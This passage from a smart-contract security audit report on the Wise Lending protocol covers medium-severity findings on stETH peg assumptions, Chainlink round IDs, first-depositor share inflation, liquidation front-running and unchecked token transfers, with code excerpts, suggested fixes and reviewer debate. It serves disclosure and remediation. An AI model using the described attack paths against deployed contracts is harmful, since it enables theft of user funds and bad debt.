@vonMangoldt can provide details on how this can be mitigated and user can still be liquidated even if they would have a chance to enter with the wrong isAave flag.

Wise Lending commented:

Mitigated here.

Medium Risk Findings (17)

[M-01] Exiting a farm on mainnet assumes a peg of 1:1 when swapping stETH for ETH

Submitted by 0xStalin

When stETH depegs from ETH, the swaps on Curve will revert due to requesting a higher amountOut than what the curves pool will give.

Proof of Concept

When exiting a farm on mainnet, the requested tokensOut is set as stETH for redeeming the SY tokens on the PENDLE_SY contract. Once the PowerFarm has on its balance the stETH tokens, it does a swap from stETH to ETH using the Curves protocol.

The problem is that the implementation is assuming a peg of 1 ETH ~= 1 stETH. Even though both tokens have a tendency to keep the peg, this hasn’t been always the case as it can be seen in this dashboard. There have been many episodes of market volatility that affected the price of stETH, notably the one in last June when stETH traded at ~0.93 ETH.

When computing the _minOutAmount, the PowerFarm calculates the ethValue of the received stETH tokens by requesting the price of the WETH asset, and then it applies the reverAllowedSpread to finally determine the _minOutAmount of ETH tokens that will be accepted from the swap on Curves.

The WETH price is pegged 1:1 to ETH, 1 WETH will always be 1 ETH, but, using the price of WETH to determine the minOutAmount is problematic, because, as seen in the dashboard, historically, 1 stETH has deppeged from 1:1 from ETH.

Example: Assume a user sets a slippage of 1%. If stETH were to depeg to 0.95 per ETH, when swapping it would try to make sure that the user received at least 0.99 ETH. Whenever trying to swap it will revert because curves can’t give the requested minOutAmount of ETH tokens, it could give at most 0.95 ETH per stETH.

function _logicClosePosition(

    //@audit-info => When exiting a farm on mainnet, the `tokenOut` is set to be `stETH`
    address tokenOut = block.chainid == 1
        ? ST_ETH_ADDRESS
        : ENTRY_ASSET;


    uint256 ethAmount = _getEthBack(
            //@audit-info => When exiting a farm on mainnet, the price of the `tokenOut` is requested as if it were the price of `WETH`
            //@audit-issue => Here is where the code assumes a peg of `1 stETH to be 1 ETH`
            block.chainid == 1
                ? WETH_ADDRESS
                : ENTRY_ASSET,
            * reverseAllowedSpread
            / PRECISION_FACTOR_E18


function _getEthBack(
    uint256 _swapAmount,
    uint256 _minOutAmount
    returns (uint256)
    if (block.chainid == ETH_CHAIN_ID) {
        //@audit-info => Does a swap of stETH for ETH on the Curves exchange
        return _swapStETHintoETH(


function _swapStETHintoETH(
    uint256 _swapAmount,
    uint256 _minOutAmount
    returns (uint256)
    return CURVE.exchange(
            fromIndex: 1,
            toIndex: 0,
            exactAmountFrom: _swapAmount,
            //@audit-info => minimum amount of ETH that the PowerFarm will accept for swapping `exactAmountFrom` of `stETH` tokens!
            minReceiveAmount: _minOutAmount

Tools Used

Referenced H-06 finding on Asymmetry Finance Solodit audit and Asymmetry’s C4 mitigation review here and here.

The recommendation would be to implement a mitigation similar to the one implemented on the referenced issues. Basically, fetch the current price of stETH from a Chainlink Oracle and multiply the minOutAmount by the current price of stETH. In this way, the minOutAmount that is sent to the Curves exchange will now be within the correct limits based on the current price of stETH.

Also, make sure to multiply the ethValueBefore by the current price of stETH (only when exiting farms on mainnet). In this way, both amounts, ethValueAfter and ethValueBefore will be computed based on the current price of stETH, allowing the slippage to validate that no ethValue was lost during the process of removing liquidity from pendle, redeeming the sy tokens and swapping on curves. In the end, both, ethValueAfter and ethValueBefore will represent the ethValue based on the stETH price.

Assessed type


vonMangoldt (Wise Lending) commented:

Since we have ethValueBefore and after we could also set it to 0 and no harm done, thus invalid.

Trust (judge) commented:

@vonMangoldt - Would need additional description for the issue described is not actually effective, as from my analysis I can’t find a counter-example.

vm06007 (Wise Lending) commented:

Mitigated here.

Additionally, the team decided to use PendleRouter (here) instead of Curve moving forward during farm exit.

Submitted by nonseodion

WiseLending calibrates Oracles to get a heartbeat which it uses for checking the staleness of prices returned from the Oracle.

To calibrate, it fetches between 3-50 inclusive historical prices and picks the second largest update time among those prices. It calls _getIterationCount() to know the number of historical prices it’ll use. If the current _latestAggregatorRoundId is less than 50 (MAX_ROUND_COUNT) it uses _latestAggregatorRoundId else it uses 50.


        res = _latestAggregatorRoundId < MAX_ROUND_COUNT
            ? _latestAggregatorRoundId
            : MAX_ROUND_COUNT;

The issue with the snippet above is that _latestAggregatorRoundId will always be greater than 50 so the number of historical prices it uses will always be 50.

It’s always greater than 50 because it is fetched from the aggregator’s proxy contract. The roundIds returned from the proxy are a combination of the current aggregator’s roundId and phaseId. Check Chainlink docs for more info. getLatestRoundId() returns the roundId.


        ) = priceFeed[_tokenAddress].latestRoundData();

The roundId returned is used in the _recalibratePreview() function below to get previous roundIds. The iterationCount as we already mentioned will always be 50.


        uint80 i = 1;
        uint256 currentDiff;
        uint256 currentBiggest;
        uint256 currentSecondBiggest;

 ❌      while (i < iterationCount) {

            uint256 currentTimestamp = _getRoundTimestamp(
 ❌              latestRoundId - i

The problem with the above call is that the argument, latestRoundId-1 above may not have valid data for some rounds. So calls to the Chainlink Oracle for those rounds will revert.

This may occur because of the way proxy roundIds work.


  • If the proxy returns 0x40000000000000010 as roundId.
  • The phaseId is 4 (roundId >> 64).
  • The aggregator roundId is 16 (uint64(roundId)).
  • After 16 iterations in _recalibratePreview(), the latestRoundId will have a value of 0x40000000000000000. When the price feed is called, with this roundId, it will revert because it does not exist.

Check Chainlink docs for more info.

Thus, if the aggregator roundId derived from the proxy roundId is less than 50, _recalibratePreview() will revert. The caller will have to wait until it is greater than 50.


  1. For new price feeds, OracleHub won’t be able to set a heartbeat until the aggregator roundId is greater than 50. So the new price feed would be unusable for that period.
  2. For price feeds that already have a heartbeat, they won’t be able to recalibrate during the period the aggregator roundId is less than 50. Which may allow the price feed return stale prices.

In both cases above the max amount of time user can wait for is 50x the official Chainlink heartbeat for the price feed, i.e. price feed heartbeat * 50.

For the BTC/ETH price feed this would be 50 days (24 hours * 50).

Consider deriving the aggregator roundId from the proxy roundId and using that instead of the proxy roundId.


-       res = _latestAggregatorRoundId < MAX_ROUND_COUNT
-           ? _latestAggregatorRoundId
+       res = uint64(_latestAggregatorRoundId) < MAX_ROUND_COUNT
+           ? uint64(_latestAggregatorRoundId)
            : MAX_ROUND_COUNT;

vonMangoldt (Wise Lending) commented:

I don’t understand the recommended mitigation steps. Its just typecasting uint64 to a uint80.

Trust (judge) commented:

Referring to this, it is clear the roundId needs to be trimmed to uint64.

0xStalin (warden) commented:

@Trust - I was checking and came to the realization that the Chainlink Documentation only explains how the proxy queries the getRoundData on the Aggregator.

However, all this logic is implemented on the Proxy itself, the AggregatorProxy.getRoundData() is on charge of trimming the roundId down to uint64 before querying the aggregator, but the proxy itself receives the roundId as an uint80. Thus, the WiseOracle contract is correctly integrated with the Chainlink contract. All the required logic to query the data from the aggregator is contained within the chainlink proxy, any contract interacting with the proxy doesn’t need to trim the received roundId.

Based on the Chainlink contracts and the way how WiseOracle queries the getRoundData(), I think there is not any issue at all. The integration looks perfectly fine, and there is no need to implement any changes. If the roundId were to be trimmed to uint64, it would disrupt the queries and it would be querying a total different values; therefore, this report looks to be invalid.

Trust (judge) commented:

I believe the root cause of the issue is correct. It is not safe to use latestRoundId - i in calculations, as the latestRoundId is crafted of a phaseID and a uint64 counter. By decreasing by a flat amount, we could find ourselves querying for an incorrect phaseID. Essentially, it is a logical overflow not detected because it occurs in internal data of a larger data type (uint80).

0xStalin (warden) commented:

I see, then the root cause seems to be correct, but is the recommendation incomplete? If so, what would it be the correct way to mitigate this issue?

At this point, I’m not arguing the validity of the report, but rather want to understand what needs to be done to fully mitigate the root cause of this issue.

Wise Lending commented:

Mitigated here.

[M-03] First depositor inflation attack in PendlePowerFarmToken

Submitted by SBSecurity, also found by 0xCiphky

In certain scenarios, shares of a subsequent depositor can be heavily reduced, losing a large amount of his deposited funds, the attacker can increase the right side of the previewMintShares by adding rewards for compounding.

That way victim can lose 6e17 of his assets for a deposit of 1e18.

Proof of Concept

Let’s see how a first user, can grief a subsequent deposit and reduce his shares from the desired 1:1 ratio to 1:0000000000000005.

First, he needs to choose PowerFarmToken with no previous deposits.

  1. He calls depositExactAmount with 2 wei which will also call syncSupply _updateRewards which is a key moment of the attack. This will make it possible PowerFarmController::exchangeRewardsForCompoundingWithIncentive to be called when performing the donation.
  2. With 2 wei user will mint 2 shares, so totalSupply = 3 and underlyingLpAssetsCurrent = 3.
  3. Then, the victim comes and tries to deposit 1e18 of assets, but is front ran by the first user calling PowerFarmController::exchangeRewardsForCompoundingWithIncentive addCompoundRewards with 999999999999999996 that will increase the totalLpAssetsToDistribute, which is added to underlyingLpAssetsCurrent in the _syncSupply function, called from the modifier before the main functions.

The attacker does not lose his deposit of 1e18 because it is converted to rewardTokens and sent to him, basically making the inflation free.


function exchangeRewardsForCompoundingWithIncentive(
      address _pendleMarket,
      address _rewardToken,
      uint256 _rewardAmount
  ) external syncSupply(_pendleMarket) returns (uint256) {
      CompoundStruct memory childInfo = pendleChildCompoundInfo[_pendleMarket];

      uint256 index = _findIndex(childInfo.rewardTokens, _rewardToken);

      if (childInfo.reservedForCompound[index] < _rewardAmount) {
          revert NotEnoughCompound();

      uint256 sendingAmount = _getAmountToSend(_pendleMarket, _getTokensInETH(_rewardToken, _rewardAmount));

      childInfo.reservedForCompound[index] -= _rewardAmount;
      pendleChildCompoundInfo[_pendleMarket] = childInfo;

      _safeTransferFrom(_pendleMarket, msg.sender, address(this), sendingAmount);

      IPendlePowerFarmToken(pendleChildAddress[_pendleMarket]).addCompoundRewards(sendingAmount);//@audit inflate

      _safeTransfer(childInfo.rewardTokens[index], msg.sender, _rewardAmount);//@audit receive back + incentive

      emit ExchangeRewardsForCompounding(_pendleMarket, _rewardToken, _rewardAmount, sendingAmount);

      return sendingAmount;

After that, totalSupply = 3, underlyingLpAssetsCurrent = 1e18 - 1. The victim transaction is then executed:


function previewMintShares(uint256 _underlyingAssetAmount, uint256 _underlyingLpAssetsCurrent)
        returns (uint256)
        return _underlyingAssetAmount * totalSupply() / _underlyingLpAssetsCurrent;
        // 1e18 * 3 / 1e18 - 1 = 2 

Both attacker and victim have 1 share, because of the fee that is taken in the deposit function.

After victim deposit: totalSupply: 5, underlyingLpAssetsCurrent = 2e18 - 1. Then, the victim tries to withdraw all his shares - 1 (1 was taken as a fee on deposit).


function previewAmountWithdrawShares(uint256 _shares, uint256 _underlyingLpAssetsCurrent)
        returns (uint256)
        return _shares * _underlyingLpAssetsCurrent / totalSupply();
	        //1 * (2e18 - 1) / 5 = 399999999999999999 (0.3e18)

User has lost 1e18 - 0.3e18 = 0.6e18 tokens.

Since there will be many PowerFarmTokens deployed, there is no way for team to perform the first deposit for all of them. Possible mitigation will be to have minimum deposit amount for the first depositor in the PendlePowerToken, which will increase the cost of the attack exponentially. There will not be enough reward tokens making the exchangeRewardsForCompoundingWithIncentive revert, due to insufficient amount. Or, could mint proper amount of tokens in the initialize function.

vm06007 (Wise Lending) commented:

Since there will be many PowerFarmTokens deployed, there is no way for team to perform the first deposit for all of them.

I think this assumption is wrong here, team deploys each token and farm by admin - one by one, and each time a new token/farm is created, team can perform first deposit or necessary step. It is not a public function to create these that team cannot handle something like that or to say “there is no way to perform the first deposit for all of them”. That’s just blown off and far fetched.

vm06007 (Wise Lending) commented:

Mitigated here.

Additional notes: before any farm is publicly available, admin creating farms can ensure no further supplier to the farm would experience any loss due to described far-fetched scenario in this “finding”.

[M-04] Withdrawing uncollateralized deposits is possible even though the position is in liquidation mode

Submitted by 0xStalin

Users can withdraw uncollateralized deposits even though their position is liquidable, as opposed to the README. If the position is in liquidation mode, users should use their uncollateralized deposits to avoid liquidation instead of removing them.

Proof of Concept

When withdrawing deposits from public pools, at the end of the tx is executed the WiseLending._healthStateCheck() function, which depending on the value of the powerFarmCheck will determine if the position’s collateral is enough to cover the borrows.

  • If powerFarmCheck is true, it will use the bare value of the collateral; meaning, the collateralFactor is not applied to the collateral’s value.
  • If powerFarmCheck is false, it will use the weighted value of the collateral; meaning, the collateralFactor is applied to the collateral’s value.

When withdrawing an uncollateralized deposit, the WiseCore._coreWithdrawToken() function calls the WiseSecurity.checksWithdraw() function to determine the value of the powerFarmCheck. If the pool from where the tokens are being withdrawn is uncollateralized, the powerFarmCheck will be set to true, which will cause that the WiseLending._healthStateCheck() function uses the bare value of the full collateral to determine if the collateral can cover the existing borrows.

Using the bare value of the collateral does not accurately reflect if a position is liquidable or not, the liquidation’s logic in the WiseSecurity.checksLiquidation() function uses the weightedCollateral instead of the bareCollateral to determine if the position is liquidable or not. This difference to determine if the position’s collateral can cover the borrows when withdrawing uncollateralized deposits and when doing liquidation causes a discrepancy to allow the withdrawal of uncollateralized deposits even though the position is in liquidation mode.

For example, a user requests a withdrawal of an uncollateralized deposit in a position with the below values:

  • 1.5e18 ETH of bare collateral.
  • 1.2e18 ETH of weightedCollateral.
  • 1.3e18 ETH of borrows.

    • The withdrawal will be allowed even though the position is in liquidation mode. Because of the powerFarmCheck being set to true, the WiseLending._healthStateCheck() function will check if 95% of the bareCollateral can cover the borrows, 95% of 1.5e18 ETH would be 1.425e18 ETH. Thus, the withdrawal will be possible, even though the position is in liquidation mode.


function checksWithdraw(

    if (_isUncollateralized(_nftId, _poolToken) == true) {
        return true;

    function _getState(
        uint256 _nftId,
        bool _powerFarm
        returns (bool)

        //@audit-info => If `powerFarmCheck` is true, overalCollateral will be computed using the value of the `bareCollateral`
        //@audit-info => If `powerFarmCheck` is false, overalCollateral will be computed using the value of the `weightedCollateral`

        uint256 overallCollateral = _powerFarm == true
            ? overallETHCollateralsBare(_nftId)
            : overallETHCollateralsWeighted(_nftId);

        //@audit-info => If 95% of the overalCollateral > borrowAmount, withdrawal will be allowed!
        return overallCollateral
            / PRECISION_FACTOR_E18
            < borrowAmount;

Now, when using the same values but for a liquidation, we have that the weightedCollateral is not enough to cover the borrows; thus, the position is liquidable.


    function checksLiquidation(

        //@audit-info => When doing liquidations, the value of the `weightedCollateral` is used to determine if the position is liquidable or not!


If the protocol wants to enforce that users use their uncollateralized deposits to avoid liquidations when the positions are liquidable, don’t set to true the powerFarmCheck when doing withdrawals for uncollateralized deposits. Allow the WiseLending._healthStateCheck() function to validate if the position is indeed in liquidation mode by using the weightedCollateral instead of the bareCollateral value.


    function checksWithdraw(

    -   if (_isUncollateralized(_nftId, _poolToken) == true) {
    -       return true;
    -   }


Assessed type


vonMangoldt (Wise Lending) commented:

That’s no issue since the additional check is reflecting a higher %. We will keep it like that.

Wise Lending commented:

Mitigated here.

[M-05] The protocol allows borrowing small positions that can create bad debt

Submitted by serial-coder, also found by serial-coder and SBSecurity

The WiseLending protocol allows users to borrow small positions. Even if the protocol has a minimum deposit (collateral) amount check to mitigate the small borrowing position from creating bad debt, this protection can be bypassed.

With a small borrowing position, there is no incentive for a liquidator to liquidate the position, as the liquidation profit may not cover the liquidation cost (gas). As a result, small liquidable positions will not be liquidated, leaving bad debt to the protocol.

Proof of Concept

The protocol allows users to borrow small positions since no minimum borrowing amount is checked in the WiseSecurity::checksBorrow().

// FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/main/contracts/WiseSecurity/WiseSecurity.sol
function checksBorrow(
    uint256 _nftId,
    address _caller,
    address _poolToken
    returns (bool specialCase) //@audit -- No minimum borrowing amount check


    if (WISE_LENDING.verifiedIsolationPool(_caller) == true) {
        return true;

    if (WISE_LENDING.positionLocked(_nftId) == true) {
        return true;

No minimum borrowing amount check.

Even if the protocol has a minimum deposit (collateral) amount check in the WiseCore::_checkDeposit() to mitigate the small borrowing position from creating bad debt, this protection can be easily bypassed.

The WiseCore::_checkMinDepositValue() is a core function that checks a minimum deposit (collateral) amount. By default, this deposit amount check would be overridden (disabled). Even though this deposit amount check will be enabled, this protection can be bypassed by withdrawing the deposited fund later, since there is no minimum withdrawal amount check in the WiseSecurity::checksWithdraw().

    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/main/contracts/WiseCore.sol
    function _checkDeposit(
        uint256 _nftId,
        address _caller,
        address _poolToken,
        uint256 _amount

        if (WISE_ORACLE.chainLinkIsDead(_poolToken) == true) {
            revert DeadOracle();



@1      WISE_SECURITY.checkPoolWithMinDeposit( //@audit -- Even if there is a minimum deposit amount check, this protection can be bypassed
@1          _poolToken,
@1          _amount
@1      );


    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/main/contracts/WiseSecurity/WiseSecurity.sol
    function _checkMinDepositValue(
        address _token,
        uint256 _amount
        returns (bool)
@2      if (minDepositEthValue == ONE_WEI) { //@audit -- By default, the minimum deposit amount check would be overridden (disabled)
@2          return true;
@2      }

@3      if (_getTokensInEth(_token, _amount) < minDepositEthValue) { //@audit -- Even though the minimum deposit amount check will be enabled, this protection can be bypassed by withdrawing the deposited fund later
@3          revert DepositAmountTooSmall();
@3      }

        return true;

@1 -- Even if there is a minimum deposit amount check, this protection can be bypassed: see here.

@2 -- By default, the minimum deposit amount check would be overridden (disabled): see here.

@3 -- Even though the minimum deposit amount check will be enabled, this protection can be bypassed by withdrawing the deposited fund later: see here.

As you can see, there is no minimum withdrawal amount check in the WiseSecurity::checksWithdraw(). Hence, a user can deposit collateral at or above the minimum deposit amount (i.e., minDepositEthValue) and then withdraw the deposited fund to be under the minDepositEthValue. Later, they can borrow a small amount with small collateral.

With a small borrowing position (and small collateral), there is no incentive for a liquidator to liquidate the position, as the liquidation profit may not cover the liquidation cost (gas). As a result, small liquidable positions will not be liquidated, leaving bad debt to the protocol.

// FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/main/contracts/WiseSecurity/WiseSecurity.sol
function checksWithdraw(
    uint256 _nftId,
    address _caller,
    address _poolToken
    returns (bool specialCase) //@audit -- No minimum withdrawal amount check
    if (_checkBlacklisted(_poolToken) == true) {

        if (overallETHBorrowBare(_nftId) > 0) {
            revert OpenBorrowPosition();

        return true;

    if (WISE_LENDING.verifiedIsolationPool(_caller) == true) {
        return true;

    if (WISE_LENDING.positionLocked(_nftId) == true) {
        return true;

    if (_isUncollateralized(_nftId, _poolToken) == true) {
        return true;

    if (WISE_LENDING.getPositionBorrowTokenLength(_nftId) == 0) {
        return true;

No minimum withdrawal amount check.

Implement the minimum borrowing amount check to limit the minimum size of borrowing positions.

vonMangoldt (Wise Lending) commented via duplicate issue #277:

Can also be circumvented by just paying back after borrowing. Doesn’t really add any value, in my opinion.

Trust (judge) commented:

The bug class is valid, in my honest opinion; as either liquidator will liquidate at a loss or protocol will be losing money to protect from bad debt over time.

Wise Lending commented:

Mitigated here.

Submitted by serial-coder

The WiseLending protocol implements the OracleHelper::_compareMinMax() to detect the circuit-breaking events of Chainlink aggregators when an asset price goes outside of pre-determined min/max values. For instance, in case of a significant price drop (e.g., LUNA crash), the asset price reported by the Chainlink price feed will continue to be at the pre-determined minAnswer instead of the actual price.

The _compareMinMax()’s objective is to prevent such a crash event that would allow a user to borrow other assets with the wrongly reported asset price. For more, refer to the case of Venus Protocol and Blizz Finance in the crash of LUNA.

However, the current implementation of the _compareMinMax() got an off-by-one bug that would prevent the function from detecting the mentioned Chainlink aggregators’ circuit-breaking events. In other words, the function will not revert the transaction if the flash crash event occurs as expected.

Proof of Concept

In the flash crash event, the Chainlink price feed will continue to return the _answer at the pre-determined minAnswer instead of the actual price. In other words, the possible minimum value of the _answer would be minAnswer.

Since the _compareMinMax() does not include the case of _answer == minAnswer (also, _answer == maxAnswer), the function could not detect whether or not the crash event happens.

    function _compareMinMax(
        IAggregator _tokenAggregator,
        int192 _answer
        int192 maxAnswer = _tokenAggregator.maxAnswer();
        int192 minAnswer = _tokenAggregator.minAnswer();

@>      if (_answer > maxAnswer || _answer < minAnswer) {
            revert OracleIsDead();


Add the cases _answer == minAnswer and _answer == maxAnswer like the snippet below:

    function _compareMinMax(
        IAggregator _tokenAggregator,
        int192 _answer
        int192 maxAnswer = _tokenAggregator.maxAnswer();
        int192 minAnswer = _tokenAggregator.minAnswer();

-       if (_answer > maxAnswer || _answer < minAnswer) {
+       if (_answer >= maxAnswer || _answer <= minAnswer) {
            revert OracleIsDead();

Assessed type


Trust (judge) decreased severity to Low

serial-coder (warden) commented:

@Trust - This is a valid medium issue as the _compareMinMax() was implemented incorrectly.

Specifically, the _compareMinMax() does not include the edge cases _answer == minAnswer and _answer == maxAnswer. So, the function cannot detect the minAnswer or maxAnswer as expected.

To elaborate, for example, the minAnswer the aggregator can report for the LINK (one of the tokens in scope) is 100000000000000 (10 ** 14). Suppose, in the event of a flash crash, the price of the LINK token drops significantly below the minAnswer (below 10 ** 14).

However, the price feed will continue to report the pre-determined minAnswer (not the actual price). Since the _compareMinMax() does not include the case _answer == minAnswer, it cannot detect this flash crash event.

In other words, the least reported price (i.e., _answer) will be the pre-determined minAnswer, not the actual price. Thus, the _compareMinMax() will never enter the if case and revert the transaction as expected because the _answer will never be less than the aggregator’s minAnswer.

    function _compareMinMax(
        IAggregator _tokenAggregator,
        int192 _answer
        int192 maxAnswer = _tokenAggregator.maxAnswer();
        int192 minAnswer = _tokenAggregator.minAnswer();

@>      if (_answer > maxAnswer || _answer < minAnswer) { //@audit -- The least reported price (i.e., `_answer`) will be the `minAnswer`. So, the function will never enter the " if " case
            revert OracleIsDead();

An example reference is here. As you can see, their recommendation includes the edge cases _answer == minAnswer and _answer == maxAnswer.

Note: to view the provided image, please see the original comment here.

Further on the TWAP Oracle:

Someone may argue that the protocol has the TWAP.

I want to point out that the TWAP setup for each price feed is only optional. If the TWAP is not set, the price deviation comparison mechanism between the TWAP’s price and Chainlink’s price will not be triggered. For this reason, this issue deserves a Medium severity.

Trust (judge) increased severity to Medium and commented:

The impact demonstrated is an incorrect validation check, which in the case maxAnswer/minAnswer are used by the feed, will make detecting black swans fail. As the team assumes those protections are in place, Medium severity is appropriate.

00xSEV (warden) commented:

@Trust - Could you double-check that it’s a valid issue? If we follow the link from the Chainlink docs and check the code here and here:

   * @param _minAnswer lowest answer the median of a report is allowed to be
   * @param _maxAnswer highest answer the median of a report is allowed to be
require(minAnswer <= median && median <= maxAnswer, "median is out of min-max range");

It means that if median == minAnswer or median == maxAnswer it still a valid value and we don’t have to revert.

serial-coder (warden) commented:

@00xSEV - The least reported price will be the pre-determined minAnswer. If you do not include the case ==, the _compareMinMax() will never enter the if case and revert the transaction. You cannot detect the black swan events without it.

The reported price will never be less than the minAnswer. (Without the ==, the if condition will always be false).

    function _compareMinMax(
        IAggregator _tokenAggregator,
        int192 _answer
        int192 maxAnswer = _tokenAggregator.maxAnswer();
        int192 minAnswer = _tokenAggregator.minAnswer();

@>      if (_answer > maxAnswer || _answer < minAnswer) { //@audit -- The least reported price (i.e., `_answer`) will be the `minAnswer`. So, the function will never enter the " if " case
            revert OracleIsDead();

Wise Lending commented:

Mitigated here.

[M-07] Unchecked return value bug on TransferHelper::_safeTransferFrom()

Submitted by serial-coder, also found by 0x11singh99, josephdara, Jorgect, unix515, Mrxstrange, nonseodion, and Rhaydden

Currently, the WiseLending protocol supports several ERC-20 tokens and will also support more tokens in the future:

ERC20 in scope: WETH, WBTC, LINK, DAI, WstETH, sDAI, USDC, USDT, WISE and may others in the future. (Also corresponding Aave tokens if existing).

On some ERC-20 tokens, the transferFrom() will return false on failure instead of reverting a transaction. I noticed that the TransferHelper::_safeTransferFrom(), which is used throughout the protocol, is vulnerable to detecting the token transfer failure if the transferFrom() returns false due to the unchecked return value bug.

The following lists the functions directly invoking the vulnerable _safeTransferFrom():

  1. WiseCore::_coreLiquidation()
  2. [`WiseLending::depositExactAmount()]`(https://github.com/code-423n4/2024-02-wise-lending/blob/79186b243d8553e66358c05497e5ccfd9488b5e2/contracts/WiseLending.sol#L476-L481)
  3. WiseLending::solelyDeposit()
  4. WiseLending::paybackExactAmount()
  5. WiseLending::paybackExactShares()
  6. FeeManager::paybackBadDebtForToken()
  7. FeeManager::paybackBadDebtNoReward()
  8. PendlePowerFarm::_manuallyPaybackShares()
  9. PendlePowerManager::enterFarm()
  10. PendlePowerFarmController::exchangeRewardsForCompoundingWithIncentive()
  11. PendlePowerFarmController::exchangeLpFeesForPendleWithIncentive()
  12. PendlePowerFarmController::lockPendle()
  13. PendlePowerFarmToken::addCompoundRewards()
  14. PendlePowerFarmToken::depositExactAmount()
  15. AaveHub::depositExactAmount()
  16. AaveHub::paybackExactAmount()
  17. AaveHub::paybackExactShares()

Due to the unchecked return value bug, users or attackers can exploit these protocol’s functions without supplying a token (please refer to the Proof of Concept section for more details).

Proof of Concept

On some ERC-20 tokens, the transferFrom() will return false on failure instead of reverting a transaction.

The WiseLending protocol implements the TransferHub::_callOptionalReturn() as a helper function for executing low-level calls. In case the transferFrom() returns false on failure, the _callOptionalReturn() will receive the returned parameters: success == true and returndata != bytes(0).

Then, the _callOptionalReturn() will decode the received returndata for the success status. If the transferFrom() returns false, the results will become false.

With the results == false, finally, the _callOptionalReturn() will return false to its function caller.

On the TransferHelper::_safeTransferFrom(), I noticed that the function does not evaluate the return value (i.e., unchecked return value bug) of the _callOptionalReturn(). Subsequently, the _safeTransferFrom() cannot detect the token transfer failure if the transferFrom() returns false.

    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/79186b243d8553e66358c05497e5ccfd9488b5e2/contracts/TransferHub/CallOptionalReturn.sol
    function _callOptionalReturn(
        address token,
        bytes memory data
        returns (bool call)
            bool success,
@1          bytes memory returndata //@audit -- On some tokens, the transferFrom() will return false instead of reverting a transaction
        ) = token.call(

@2      bool results = returndata.length == 0 || abi.decode(
@2          returndata, //@audit -- If the transferFrom() returns false, the results == false
@2          (bool)
@2      );

        if (success == false) {

@3      call = success
@3          && results // @audit -- If the results == false, the _callOptionalReturn() will return false
@3          && token.code.length > 0;


    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/79186b243d8553e66358c05497e5ccfd9488b5e2/contracts/TransferHub/TransferHelper.sol
    function _safeTransferFrom(
        address _token,
        address _from,
        address _to,
        uint256 _value
@4      _callOptionalReturn( //@audit -- The _safeTransferFrom() cannot detect the token transfer failure if the transferFrom() returns false instead of reverting a transaction due to the unchecked return value bug

@1 -- On some tokens, the transferFrom() will return false instead of reverting a transaction: see here.

@2 -- If the transferFrom() returns false, the results == false: see here.

@3 -- If the results == false, the _callOptionalReturn() will return false: see here.

@4 -- The _safeTransferFrom() cannot detect the token transfer failure if the transferFrom() returns false instead of reverting a transaction due to the unchecked return value bug: see here.

Note: Please refer to the Impact section for a complete list of the functions directly invoking the vulnerable _safeTransferFrom().

The following briefly analyzes 2 of the 17 functions that would affect the exploitation as examples:

  • Due to the unchecked return value bug, the WiseCore::_coreLiquidation() cannot be aware of the token transfer failure. Thus, a rogue liquidator can steal collateral from the target liquidable position without supplying any debt token (tokenToPayback).
  • On the WiseLending::depositExactAmount(), a rogue depositor can increase their collateral without spending any token.
    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/79186b243d8553e66358c05497e5ccfd9488b5e2/contracts/WiseCore.sol
    function _coreLiquidation(
        CoreLiquidationStruct memory _data
        returns (uint256 receiveAmount)

@5      _safeTransferFrom( //@audit -- Liquidator can steal collateral (_receiveToken) from the target liquidable position
@5          _data.tokenToPayback,
@5          _data.caller,
@5          address(this),
@5          _data.paybackAmount
@5      );



    // FILE: https://github.com/code-423n4/2024-02-wise-lending/blob/79186b243d8553e66358c05497e5ccfd9488b5e2/contracts/WiseLending.sol
    function depositExactAmount(
        uint256 _nftId,
        address _poolToken,
        uint256 _amount
        returns (uint256)
        uint256 shareAmount = _handleDeposit(

@6      _safeTransferFrom( //@audit -- Depositor can increase their collateral without supplying any token
@6          _poolToken,
@6          msg.sender,
@6          address(this),
@6          _amount
@6      );

        return shareAmount;

@5 -- Liquidator can steal collateral (_receiveToken) from the target liquidable position: see here.

@6 -- Depositor can increase their collateral without supplying any token: see here.

Improve the _safeTransferFrom() by checking the return value from the _callOptionalReturn() and reverting a transaction if it is false.

    function _safeTransferFrom(
        address _token,
        address _from,
        address _to,
        uint256 _value
-       _callOptionalReturn(
+       bool success = _callOptionalReturn(

+       require(success, "Token transfer failed");

Assessed type

Invalid Validation

vm06007 (Wise Lending) commented:

This then leads to some tokens unusable (like USDT, for example) and this topic was already discussed severely during hats competition where I can send links to findings, so should be scraped in my opinion. Also sufficient checks are already done in _callOptionalReturn directly.

vm06007 (Wise Lending) commented:

Mitigated here.

Additionally, WiseLending is not meant to be used with corrupted tokens that have unsupported transfer/transferFrom implementations.

[M-08] Borrowers can DoS liquidations by repaying as little as 1 share.

Submitted by 0xStalin, also found by Dup1337 and Jorgect

Liquidations can be DoSed which increments the risk of bad debt being generated on position.

Proof of Concept

When a liquidator is liquidating a position in WiseLending, the liquidator needs to specify the amount of shares to be repaid. The liquidation logic checks if the positions are indeed liquidable, if so, it validates if the number of shares to be liquidated exceeds the total amount of shares that can be liquidated by using the WiseSecurityHelper.checkMaxShares() function. If the amount of shares the liquidator intends to liquidate exceeds the maximum amount of liquidable shares, the execution is reverted.

  • When the position has generated bad debt, the liquidation can liquidate all the user’s borrowShares on the pool been liquidated.
  • When the position has not generated bad debt, the maximum amount of liquidable shares is 50% of the existing user’s borrowShares on the pool being liquidated.

The problem with this approach is that borrowers can frontrun the liquidation and repay as little as 1 share of the existing debt on the same pool that the liquidator decided to liquidate the debt from. This will cause when the liquidation is executed, the total borrow shares of the user on the pool being liquidated to be lower. If the liquidator was trying to liquidate the maximum possible amount of shares, now, the maxShares that can be liquidated will be slightly less than the amount of shares that the liquidator specified, which will cause the tx to revert.

    function checkMaxShares(
        uint256 _nftId,
        address _tokenToPayback,
        uint256 _borrowETHTotal,
        uint256 _unweightedCollateralETH,
        uint256 _shareAmountToPay
        //@audit-ok => total borrowShares a position owns for a _tokenToPayback pool
        uint256 totalSharesUser = WISE_LENDING.getPositionBorrowShares(

        //@audit-info => If baddebt, maxShares that can be liquidated are the totalSharesUser
        //@audit-info => If not baddebt, maxShares can be 50% of the total borrowShares
